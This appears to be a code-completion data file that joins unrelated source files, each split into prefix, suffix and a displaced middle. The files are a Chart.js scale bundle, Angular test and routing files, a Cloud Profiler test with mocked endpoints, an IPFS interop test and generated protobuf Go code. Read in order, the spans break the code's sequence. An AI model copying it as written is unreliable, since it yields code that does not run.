var pointLabeFontFamily = getValueOrDefault(pointLabelOpts.fontFamily, globalDefaults.defaultFontFamily);
var pointLabeFont = helpers.fontString(pointLabelFontSize, pointLabeFontStyle, pointLabeFontFamily);
for (var i = me.getValueCount() - 1; i >= 0; i--) {
if (angleLineOpts.display) {
var outerPosition = me.getPointPosition(i, outerDistance);
ctx.beginPath();
ctx.moveTo(me.xCenter, me.yCenter);
ctx.lineTo(outerPosition.x, outerPosition.y);
ctx.stroke();
ctx.closePath();
}
// Extra 3px out for some label spacing
var pointLabelPosition = me.getPointPosition(i, outerDistance + 5);
// Keep this in loop since we may support array properties here
var pointLabelFontColor = getValueOrDefault(pointLabelOpts.fontColor, globalDefaults.defaultFontColor);
ctx.font = pointLabeFont;
ctx.fillStyle = pointLabelFontColor;
var pointLabels = me.pointLabels;
// Add quarter circle to make degree 0 mean top of circle
var angleRadians = this.getIndexAngle(i) + (Math.PI / 2);
var angle = (angleRadians * 360 / (2 * Math.PI)) % 360;
if (angle === 0 || angle === 180) {
ctx.textAlign = 'center';
} else if (angle < 180) {
ctx.textAlign = 'left';
} else {
ctx.textAlign = 'right';
}
// Set the correct text baseline based on outer positioning
if (angle === 90 || angle === 270) {
ctx.textBaseline = 'middle';
} else if (angle > 270 || angle < 90) {
ctx.textBaseline = 'bottom';
} else {
ctx.textBaseline = 'top';
}
ctx.fillText(pointLabels[i] ? pointLabels[i] : '', pointLabelPosition.x, pointLabelPosition.y);
}
}
}
}
});
Chart.scaleService.registerScaleType('radialLinear', LinearRadialScale, defaultConfig);
};
}, {}], 46: [function (require, module, exports) {
/* global window: false */
'use strict';
var moment = require(1);
moment = typeof(moment) === 'function' ? moment : window.moment;
module.exports = function (Chart) {
var helpers = Chart.helpers;
var time = {
units: [{
name: 'millisecond',
steps: [1, 2, 5, 10, 20, 50, 100, 250, 500]
}, {
name: 'second',
steps: [1, 2, 5, 10, 30]
}, {
name: 'minute',
steps: [1, 2, 5, 10, 30]
}, {
name: 'hour',
steps: [1, 2, 3, 6, 12]
}, {
name: 'day',
steps: [1, 2, 5]
}, {
name: 'week',
maxStep: 4
}, {
name: 'month',
maxStep: 3
}, {
name: 'quarter',
maxStep: 4
}, {
name: 'year',
maxStep: false
}]
};
var defaultConfig = {
position: 'bottom',
time: {
parser: false, // false == a pattern string from http://momentjs.com/docs/#/parsing/string-format/ or a custom callback that converts its argument to a moment
format: false, // DEPRECATED false == date objects, moment object, callback or a pattern string from http://momentjs.com/docs/#/parsing/string-format/
unit: false, // false == automatic or override with week, month, year, etc.
round: false, // none, or override with week, month, year, etc.
displayFormat: false, // DEPRECATED
isoWeekday: false, // override week start day - see http://momentjs.com/docs/#/get-set/iso-weekday/
minUnit: 'millisecond',
// defaults to unit's corresponding unitFormat below or override using pattern string from http://momentjs.com/docs/#/displaying/format/
displayFormats: {
millisecond: 'h:mm:ss.SSS a', // 11:20:01.123 AM,
second: 'h:mm:ss a', // 11:20:01 AM
minute: 'h:mm:ss a', // 11:20:01 AM
hour: 'MMM D, hA', // Sept 4, 5PM
day: 'll', // Sep 4 2015
week: 'll', // Week 46, or maybe "[W]WW - YYYY" ?
month: 'MMM YYYY', // Sept 2015
quarter: '[Q]Q - YYYY', // Q3
year: 'YYYY' // 2015
}
},
ticks: {
autoSkip: false
}
};
var TimeScale = Chart.Scale.extend({
initialize: function () {
if (!moment) {
throw new Error('Chart.js - Moment.js could not be found! You must include it before Chart.js to use the time scale. Download at https://momentjs.com');
}
Chart.Scale.prototype.initialize.call(this);
},
getLabelMoment: function (datasetIndex, index) {
if (datasetIndex === null || index === null) {
return null;
}
if (typeof this.labelMoments[datasetIndex] !== 'undefined') {
return this.labelMoments[datasetIndex][index];
}
return null;
},
getLabelDiff: function (datasetIndex, index) {
var me = this;
if (datasetIndex === null || index === null) {
return null;
}
if (me.labelDiffs === undefined) {
me.buildLabelDiffs();
}
if (typeof me.labelDiffs[datasetIndex] !== 'undefined') {
return me.labelDiffs[datasetIndex][index];
}
return null;
},
getMomentStartOf: function (tick) {
var me = this;
if (me.options.time.unit === 'week' && me.options.time.isoWeekday !== false) {
return tick.clone().startOf('isoWeek').isoWeekday(me.options.time.isoWeekday);
}
return tick.clone().startOf(me.tickUnit);
},
determineDataLimits: function () {
var me = this;
me.labelMoments = [];
// Only parse these once. If the dataset does not have data as x,y pairs, we will use
// these
var scaleLabelMoments = [];
if (me.chart.data.labels && me.chart.data.labels.length > 0) {
helpers.each(me.chart.data.labels, function (label) {
var labelMoment = me.parseTime(label);
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
scaleLabelMoments.push(labelMoment);
}
}, me);
me.firstTick = moment.min.call(me, scaleLabelMoments);
me.lastTick = moment.max.call(me, scaleLabelMoments);
} else {
me.firstTick = null;
me.lastTick = null;
}
helpers.each(me.chart.data.datasets, function (dataset, datasetIndex) {
var momentsForDataset = [];
var datasetVisible = me.chart.isDatasetVisible(datasetIndex);
if (typeof dataset.data[0] === 'object' && dataset.data[0] !== null) {
helpers.each(dataset.data, function (value) {
var labelMoment = me.parseTime(me.getRightValue(value));
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
momentsForDataset.push(labelMoment);
if (datasetVisible) {
// May have gone outside the scale ranges, make sure we keep the first and last ticks updated
me.firstTick = me.firstTick !== null ? moment.min(me.firstTick, labelMoment) : labelMoment;
me.lastTick = me.lastTick !== null ? moment.max(me.lastTick, labelMoment) : labelMoment;
}
}
}, me);
} else {
// We have no labels. Use the ones from the scale
momentsForDataset = scaleLabelMoments;
}
me.labelMoments.push(momentsForDataset);
}, me);
// Set these after we've done all the data
if (me.options.time.min) {
me.firstTick = me.parseTime(me.options.time.min);
}
if (me.options.time.max) {
me.lastTick = me.parseTime(me.options.time.max);
}
// We will modify these, so clone for later
me.firstTick = (me.firstTick || moment()).clone();
me.lastTick = (me.lastTick || moment()).clone();
},
buildLabelDiffs: function () {
var me = this;
me.labelDiffs = [];
var scaleLabelDiffs = [];
// Parse common labels once
if (me.chart.data.labels && me.chart.data.labels.length > 0) {
helpers.each(me.chart.data.labels, function (label) {
var labelMoment = me.parseTime(label);
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
scaleLabelDiffs.push(labelMoment.diff(me.firstTick, me.tickUnit, true));
}
}, me);
}
helpers.each(me.chart.data.datasets, function (dataset) {
var diffsForDataset = [];
if (typeof dataset.data[0] === 'object' && dataset.data[0] !== null) {
helpers.each(dataset.data, function (value) {
var labelMoment = me.parseTime(me.getRightValue(value));
if (labelMoment.isValid()) {
if (me.options.time.round) {
labelMoment.startOf(me.options.time.round);
}
diffsForDataset.push(labelMoment.diff(me.firstTick, me.tickUnit, true));
}
}, me);
} else {
// We have no labels. Use common ones
diffsForDataset = scaleLabelDiffs;
}
me.labelDiffs.push(diffsForDataset);
}, me);
},
buildTicks: function () {
var me = this;
me.ctx.save();
var tickFontSize = helpers.getValueOrDefault(me.options.ticks.fontSize, Chart.defaults.global.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(me.options.ticks.fontStyle, Chart.defaults.global.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(me.options.ticks.fontFamily, Chart.defaults.global.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
me.ctx.font = tickLabelFont;
me.ticks = [];
me.unitScale = 1; // How much we scale the unit by, ie 2 means 2x unit per step
me.scaleSizeInUnits = 0; // How large the scale is in the base unit (seconds, minutes, etc)
// Set unit override if applicable
if (me.options.time.unit) {
me.tickUnit = me.options.time.unit || 'day';
me.displayFormat = me.options.time.displayFormats[me.tickUnit];
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, 1);
} else {
// Determine the smallest needed unit of the time
var innerWidth = me.isHorizontal() ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
// Crude approximation of what the label length might be
var tempFirstLabel = me.tickFormatFunction(me.firstTick, 0, []);
var tickLabelWidth = me.ctx.measureText(tempFirstLabel).width;
var cosRotation = Math.cos(helpers.toRadians(me.options.ticks.maxRotation));
var sinRotation = Math.sin(helpers.toRadians(me.options.ticks.maxRotation));
tickLabelWidth = (tickLabelWidth * cosRotation) + (tickFontSize * sinRotation);
var labelCapacity = innerWidth / (tickLabelWidth);
// Start as small as possible
me.tickUnit = me.options.time.minUnit;
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
me.displayFormat = me.options.time.displayFormats[me.tickUnit];
var unitDefinitionIndex = 0;
var unitDefinition = time.units[unitDefinitionIndex];
// While we aren't ideal and we don't have units left
while (unitDefinitionIndex < time.units.length) {
// Can we scale this unit. If `false` we can scale infinitely
me.unitScale = 1;
if (helpers.isArray(unitDefinition.steps) && Math.ceil(me.scaleSizeInUnits / labelCapacity) < helpers.max(unitDefinition.steps)) {
// Use one of the predefined steps
for (var idx = 0; idx < unitDefinition.steps.length; ++idx) {
if (unitDefinition.steps[idx] >= Math.ceil(me.scaleSizeInUnits / labelCapacity)) {
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, unitDefinition.steps[idx]);
break;
}
}
break;
} else if ((unitDefinition.maxStep === false) || (Math.ceil(me.scaleSizeInUnits / labelCapacity) < unitDefinition.maxStep)) {
// We have a max step. Scale this unit
me.unitScale = helpers.getValueOrDefault(me.options.time.unitStepSize, Math.ceil(me.scaleSizeInUnits / labelCapacity));
break;
} else {
// Move to the next unit up
++unitDefinitionIndex;
unitDefinition = time.units[unitDefinitionIndex];
me.tickUnit = unitDefinition.name;
var leadingUnitBuffer = me.firstTick.diff(me.getMomentStartOf(me.firstTick), me.tickUnit, true);
var trailingUnitBuffer = me.getMomentStartOf(me.lastTick.clone().add(1, me.tickUnit)).diff(me.lastTick, me.tickUnit, true);
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true) + leadingUnitBuffer + trailingUnitBuffer;
me.displayFormat = me.options.time.displayFormats[unitDefinition.name];
}
}
}
var roundedStart;
// Only round the first tick if we have no hard minimum
if (!me.options.time.min) {
me.firstTick = me.getMomentStartOf(me.firstTick);
roundedStart = me.firstTick;
} else {
roundedStart = me.getMomentStartOf(me.firstTick);
}
// Only round the last tick if we have no hard maximum
if (!me.options.time.max) {
var roundedEnd = me.getMomentStartOf(me.lastTick);
var delta = roundedEnd.diff(me.lastTick, me.tickUnit, true);
if (delta < 0) {
// Do not use end of because we need me to be in the next time unit
me.lastTick = me.getMomentStartOf(me.lastTick.add(1, me.tickUnit));
} else if (delta >= 0) {
me.lastTick = roundedEnd;
}
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
}
// Tick displayFormat override
if (me.options.time.displayFormat) {
me.displayFormat = me.options.time.displayFormat;
}
// first tick. will have been rounded correctly if options.time.min is not specified
me.ticks.push(me.firstTick.clone());
// For every unit in between the first and last moment, create a moment and add it to the ticks tick
for (var i = 1; i <= me.scaleSizeInUnits; ++i) {
var newTick = roundedStart.clone().add(i, me.tickUnit);
// Are we greater than the max time
if (me.options.time.max && newTick.diff(me.lastTick, me.tickUnit, true) >= 0) {
break;
}
if (i % me.unitScale === 0) {
me.ticks.push(newTick);
}
}
// Always show the right tick
var diff = me.ticks[me.ticks.length - 1].diff(me.lastTick, me.tickUnit);
if (diff !== 0 || me.scaleSizeInUnits === 0) {
// this is a weird case. If the <max> option is the same as the end option, we can't just diff the times because the tick was created from the roundedStart
// but the last tick was not rounded.
if (me.options.time.max) {
me.ticks.push(me.lastTick.clone());
me.scaleSizeInUnits = me.lastTick.diff(me.ticks[0], me.tickUnit, true);
} else {
me.ticks.push(me.lastTick.clone());
me.scaleSizeInUnits = me.lastTick.diff(me.firstTick, me.tickUnit, true);
}
}
me.ctx.restore();
// Invalidate label diffs cache
me.labelDiffs = undefined;
},
// Get tooltip label
getLabelForIndex: function (index, datasetIndex) {
var me = this;
var label = me.chart.data.labels && index < me.chart.data.labels.length ? me.chart.data.labels[index] : '';
if (typeof me.chart.data.datasets[datasetIndex].data[0] === 'object') {
label = me.getRightValue(me.chart.data.datasets[datasetIndex].data[index]);
}
// Format nicely
if (me.options.time.tooltipFormat) {
label = me.parseTime(label).format(me.options.time.tooltipFormat);
}
return label;
},
// Function to format an individual tick mark
tickFormatFunction: function (tick, index, ticks) {
var formattedTick = tick.format(this.displayFormat);
var tickOpts = this.options.ticks;
var callback = helpers.getValueOrDefault(tickOpts.callback, tickOpts.userCallback);
if (callback) {
return callback(formattedTick, index, ticks);
}
return formattedTick;
},
convertTicksToLabels: function () {
var me = this;
me.tickMoments = me.ticks;
me.ticks = me.ticks.map(me.tickFormatFunction, me);
},
getPixelForValue: function (value, index, datasetIndex) {
var me = this;
var offset = null;
if (index !== undefined && datasetIndex !== undefined) {
offset = me.getLabelDiff(datasetIndex, index);
}
if (offset === null) {
if (!value || !value.isValid) {
// not already a moment object
value = me.parseTime(me.getRightValue(value));
}
if (value && value.isValid && value.isValid()) {
offset = value.diff(me.firstTick, me.tickUnit, true);
}
}
if (offset !== null) {
var decimal = offset !== 0 ? offset / me.scaleSizeInUnits : offset;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueOffset = (innerWidth * decimal) + me.paddingLeft;
return me.left + Math.round(valueOffset);
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
var heightOffset = (innerHeight * decimal) + me.paddingTop;
return me.top + Math.round(heightOffset);
}
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.tickMoments[index], null, null);
},
getValueForPixel: function (pixel) {
var me = this;
var innerDimension = me.isHorizontal() ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
var offset = (pixel - (me.isHorizontal() ? me.left + me.paddingLeft : me.top + me.paddingTop)) / innerDimension;
offset *= me.scaleSizeInUnits;
return me.firstTick.clone().add(moment.duration(offset, me.tickUnit).asSeconds(), 'seconds');
},
parseTime: function (label) {
var me = this;
if (typeof me.options.time.parser === 'string') {
return moment(label, me.options.time.parser);
}
if (typeof me.options.time.parser === 'function') {
return me.options.time.parser(label);
}
// Date objects
if (typeof label.getMonth === 'function' || typeof label === 'number') {
return moment(label);
}
// Moment support
if (label.isValid && label.isValid()) {
return label;
}
// Custom parsing (return an instance of moment)
if (typeof me.options.time.format !== 'string' && me.options.time.format.call) {
console.warn('options.time.format is deprecated and replaced by options.time.parser. See http://nnnick.github.io/Chart.js/docs-v2/#scales-time-scale');
return me.options.time.format(label);
}
// Moment format parsing
return moment(label, me.options.time.format);
}
});
Chart.scaleService.registerScaleType('time', TimeScale, defaultConfig);
};
}, {"1": 1}]
}, {}, [7])(7)
}); | var x = vm.x;
var y = vm.y; |
app.e2e-spec.ts | import { AppPage } from './app.po';
import { browser, logging } from 'protractor';
describe('workspace-project App', () => {
let page: AppPage;
beforeEach(() => {
page = new AppPage();
});
it('should display welcome message', () => {
page.navigateTo();
expect(page.getTitleText()).toEqual('payment-tracker app is running!');
});
afterEach(async () => {
// Assert that there are no errors emitted from the browser | const logs = await browser.manage().logs().get(logging.Type.BROWSER);
expect(logs).not.toContain(jasmine.objectContaining({
level: logging.Level.SEVERE,
} as logging.Entry));
});
}); | |
root-routing.module.ts | import { NgModule } from '@angular/core';
import { NavigationEnd, Router, RouterModule, Routes } from '@angular/router';
import { AppUiCustomizationService } from '@shared/common/ui/app-ui-customization.service';
const routes: Routes = [
{ path: '', redirectTo: '/app/main/dashboard', pathMatch: 'full' },
{
path: 'account',
loadChildren: 'account/account.module#AccountModule', //Lazy load account module
data: { preload: true }
}
];
@NgModule({
imports: [RouterModule.forRoot(routes)], | providers: []
})
export class RootRoutingModule {
constructor(
private router: Router,
private _uiCustomizationService: AppUiCustomizationService) {
router.events.subscribe((event: NavigationEnd) => {
setTimeout(() => {
this.toggleBodyCssClass(event.url);
}, 0);
});
}
toggleBodyCssClass(url: string): void {
if (url) {
if (url === '/') {
if (eaf.session.userId > 0) {
this.setAppModuleBodyClassInternal();
} else {
this.setAccountModuleBodyClassInternal();
}
}
if (url.indexOf('/account/') >= 0) {
this.setAccountModuleBodyClassInternal();
} else {
this.setAppModuleBodyClassInternal();
}
}
}
setAppModuleBodyClassInternal(): void {
let currentBodyClass = document.body.className;
let classesToRemember = '';
if (currentBodyClass.indexOf('m-brand--minimize') >= 0) {
classesToRemember += ' m-brand--minimize ';
}
if (currentBodyClass.indexOf('m-aside-left--minimize') >= 0) {
classesToRemember += ' m-aside-left--minimize';
}
if (currentBodyClass.indexOf('m-brand--hide') >= 0) {
classesToRemember += ' m-brand--hide';
}
if (currentBodyClass.indexOf('m-aside-left--hide') >= 0) {
classesToRemember += ' m-aside-left--hide';
}
if (currentBodyClass.indexOf('swal2-toast-shown') >= 0) {
classesToRemember += ' swal2-toast-shown';
}
document.body.className = this._uiCustomizationService.getAppModuleBodyClass() + ' ' + classesToRemember;
}
setAccountModuleBodyClassInternal(): void {
let currentBodyClass = document.body.className;
let classesToRemember = '';
if (currentBodyClass.indexOf('swal2-toast-shown') >= 0) {
classesToRemember += ' swal2-toast-shown';
}
document.body.className = this._uiCustomizationService.getAccountModuleBodyClass() + ' ' + classesToRemember;
}
getSetting(key: string): string {
return eaf.setting.get(key);
}
} | exports: [RouterModule], |
test-start.ts | // Copyright 2017 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
import * as assert from 'assert';
import {describe, it, before, after} from 'mocha';
import delay from 'delay';
import * as nock from 'nock';
import {promisify} from 'util';
import * as zlib from 'zlib';
import {perftools} from '../protos/profile';
import {RequestProfile} from '../src/profiler';
const API = 'https://cloudprofiler.googleapis.com/v2';
let savedEnv: {};
let uploadedProfiles: RequestProfile[] = new Array<RequestProfile>();
let createProfileCount = 0;
nock.disableNetConnect();
// eslint-disable-next-line @typescript-eslint/no-var-requires
const fakeCredentials = require('../../test/fixtures/gcloud-credentials.json');
// Start profiler and collect profiles before testing.
before(async () => {
savedEnv = process.env;
process.env = {};
process.env.GCLOUD_PROJECT = 'test-projectId';
process.env.GAE_SERVICE = 'test-service';
process.env.GAE_VERSION = '0.0.0';
// Mock profiler API.
nock(API)
.persist()
.post('/projects/' + process.env.GCLOUD_PROJECT + '/profiles')
.delay(1000)
.reply(
200,
(): RequestProfile => {
let prof;
if (createProfileCount % 2 === 0) {
prof = {
name: 'projects/X/test-projectId',
profileType: 'WALL',
duration: '10s',
};
} else {
prof = {
name: 'projects/X/test-projectId',
profileType: 'HEAP',
duration: '10s',
};
}
createProfileCount++;
return prof;
}
);
const tempUploadedProfiles = new Array<RequestProfile>();
nock(API)
.persist()
.patch('/projects/X/test-projectId')
.reply(200, (_: RequestProfile, body: RequestProfile) => {
if (typeof body === 'string') {
body = JSON.parse(body);
}
tempUploadedProfiles.push(body);
});
nock('https://oauth2.googleapis.com')
.post(/\/token/, () => true) | .reply(200, {
refresh_token: 'hello',
access_token: 'goodbye',
expiry_date: new Date(9999, 1, 1),
});
// start profiling and wait to collect profiles.
// eslint-disable-next-line @typescript-eslint/no-var-requires
const profiler = require('../src/index');
profiler.start({credentials: fakeCredentials});
await delay(30 * 1000);
// copy over currently uploaded profiles, so all tests look at same profiles.
uploadedProfiles = tempUploadedProfiles.slice();
// Restore environment variables and mocks.
process.env = savedEnv;
});
// Restore environment variables after tests.
// nock not restored, since profiles still being uploaded.
after(() => {
process.env = savedEnv;
});
describe('start', () => {
it('should have uploaded multiple profiles', () => {
nock.restore();
assert.ok(
uploadedProfiles.length >= 2,
'Expected 2 or more profiles to be uploaded'
);
});
it('should have uploaded wall profile with samples first', async () => {
const wall = uploadedProfiles[0];
const decodedBytes = Buffer.from(wall.profileBytes as string, 'base64');
const unzippedBytes = (await promisify(zlib.gunzip)(
decodedBytes
)) as Uint8Array;
const outProfile = perftools.profiles.Profile.decode(unzippedBytes);
assert.strictEqual(wall.profileType, 'WALL');
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].type as number],
'sample'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].type as number],
'wall'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].unit as number],
'count'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].unit as number],
'microseconds'
);
assert.ok(outProfile.sample.length > 0, 'Expected 1 or more samples');
});
it('should have uploaded heap profile second', async () => {
const heap = uploadedProfiles[1];
const decodedBytes = Buffer.from(heap.profileBytes as string, 'base64');
const unzippedBytes = (await promisify(zlib.gunzip)(
decodedBytes
)) as Uint8Array;
const outProfile = perftools.profiles.Profile.decode(unzippedBytes);
assert.strictEqual(heap.profileType, 'HEAP');
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].type as number],
'objects'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].type as number],
'space'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].unit as number],
'count'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].unit as number],
'bytes'
);
});
}); | .once() |
repo.js | /* eslint-env mocha */
'use strict'
const chai = require('chai')
const dirtyChai = require('dirty-chai')
const expect = chai.expect
chai.use(dirtyChai)
const waterfall = require('async/waterfall')
const bl = require('bl')
const crypto = require('crypto')
const os = require('os')
const GoDaemon = require('./daemons/go')
const JsDaemon = require('./daemons/js')
function | (daemon, hash, data, callback) {
waterfall([
(cb) => daemon.api.cat(hash, cb),
(stream, cb) => stream.pipe(bl(cb))
], (err, file) => {
console.log('got file')
expect(err).to.not.exist()
expect(file).to.be.eql(data)
callback()
})
}
describe('repo', () => {
it('read repo: go -> js', (done) => {
const dir = os.tmpdir() + '/' + Math.ceil(Math.random() * 10000)
const data = crypto.randomBytes(1024 * 5)
const goDaemon = new GoDaemon({
init: true,
disposable: false,
path: dir
})
let jsDaemon
let hash
waterfall([
(cb) => goDaemon.start(cb),
(cb) => goDaemon.api.add(data, cb),
(res, cb) => {
hash = res[0].hash
catAndCheck(goDaemon, hash, data, cb)
},
(cb) => goDaemon.stop(cb),
(cb) => {
jsDaemon = new JsDaemon({
init: false,
disposable: false,
path: dir
})
jsDaemon.start(cb)
},
(cb) => catAndCheck(goDaemon, hash, data, cb),
(cb) => jsDaemon.stop(cb)
], done)
})
it('read repo: js -> go', (done) => {
const dir = os.tmpdir() + '/' + Math.ceil(Math.random() * 10000)
const data = crypto.randomBytes(1024 * 5)
const jsDaemon = new JsDaemon({init: true, disposable: false, path: dir})
let goDaemon
let hash
waterfall([
(cb) => jsDaemon.start(cb),
(cb) => jsDaemon.api.add(data, cb),
(res, cb) => {
hash = res[0].hash
catAndCheck(jsDaemon, hash, data, cb)
},
(cb) => jsDaemon.stop(cb),
(cb) => {
goDaemon = new GoDaemon({init: false, disposable: false, path: dir})
goDaemon.start(cb)
},
(cb) => catAndCheck(goDaemon, hash, data, cb),
(cb) => goDaemon.stop(cb)
], done)
})
})
| catAndCheck |
services.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/plannings/services.proto
package plannings
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
resources "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/resources"
proto "github.com/golang/protobuf/proto"
status "google.golang.org/genproto/googleapis/rpc/status"
math "math"
) | // Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// Represents a request for creating a pod's plannings
type CreatePodPlanningsRequest struct {
PodPlannings []*PodPlanning `protobuf:"bytes,1,rep,name=pod_plannings,json=podPlannings,proto3" json:"pod_plannings,omitempty"`
Granularity int64 `protobuf:"varint,2,opt,name=granularity,proto3" json:"granularity,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *CreatePodPlanningsRequest) Reset() { *m = CreatePodPlanningsRequest{} }
func (m *CreatePodPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*CreatePodPlanningsRequest) ProtoMessage() {}
func (*CreatePodPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{0}
}
func (m *CreatePodPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_CreatePodPlanningsRequest.Unmarshal(m, b)
}
func (m *CreatePodPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_CreatePodPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *CreatePodPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_CreatePodPlanningsRequest.Merge(m, src)
}
func (m *CreatePodPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_CreatePodPlanningsRequest.Size(m)
}
func (m *CreatePodPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_CreatePodPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_CreatePodPlanningsRequest proto.InternalMessageInfo
func (m *CreatePodPlanningsRequest) GetPodPlannings() []*PodPlanning {
if m != nil {
return m.PodPlannings
}
return nil
}
func (m *CreatePodPlanningsRequest) GetGranularity() int64 {
if m != nil {
return m.Granularity
}
return 0
}
// Represents a request for creating a controller's plannings
type CreateControllerPlanningsRequest struct {
ControllerPlannings []*ControllerPlanning `protobuf:"bytes,1,rep,name=controller_plannings,json=controllerPlannings,proto3" json:"controller_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *CreateControllerPlanningsRequest) Reset() { *m = CreateControllerPlanningsRequest{} }
func (m *CreateControllerPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*CreateControllerPlanningsRequest) ProtoMessage() {}
func (*CreateControllerPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{1}
}
func (m *CreateControllerPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_CreateControllerPlanningsRequest.Unmarshal(m, b)
}
func (m *CreateControllerPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_CreateControllerPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *CreateControllerPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_CreateControllerPlanningsRequest.Merge(m, src)
}
func (m *CreateControllerPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_CreateControllerPlanningsRequest.Size(m)
}
func (m *CreateControllerPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_CreateControllerPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_CreateControllerPlanningsRequest proto.InternalMessageInfo
func (m *CreateControllerPlanningsRequest) GetControllerPlannings() []*ControllerPlanning {
if m != nil {
return m.ControllerPlannings
}
return nil
}
// Represents a request for listing plannings of pods
type ListPodPlanningsRequest struct {
QueryCondition *common.QueryCondition `protobuf:"bytes,1,opt,name=query_condition,json=queryCondition,proto3" json:"query_condition,omitempty"`
NamespacedName *resources.NamespacedName `protobuf:"bytes,2,opt,name=namespaced_name,json=namespacedName,proto3" json:"namespaced_name,omitempty"`
Kind resources.Kind `protobuf:"varint,3,opt,name=kind,proto3,enum=containersai.alameda.v1alpha1.datahub.resources.Kind" json:"kind,omitempty"`
Granularity int64 `protobuf:"varint,4,opt,name=granularity,proto3" json:"granularity,omitempty"`
PlanningType PlanningType `protobuf:"varint,5,opt,name=planning_type,json=planningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.PlanningType" json:"planning_type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListPodPlanningsRequest) Reset() { *m = ListPodPlanningsRequest{} }
func (m *ListPodPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*ListPodPlanningsRequest) ProtoMessage() {}
func (*ListPodPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{2}
}
func (m *ListPodPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListPodPlanningsRequest.Unmarshal(m, b)
}
func (m *ListPodPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListPodPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *ListPodPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListPodPlanningsRequest.Merge(m, src)
}
func (m *ListPodPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_ListPodPlanningsRequest.Size(m)
}
func (m *ListPodPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_ListPodPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_ListPodPlanningsRequest proto.InternalMessageInfo
func (m *ListPodPlanningsRequest) GetQueryCondition() *common.QueryCondition {
if m != nil {
return m.QueryCondition
}
return nil
}
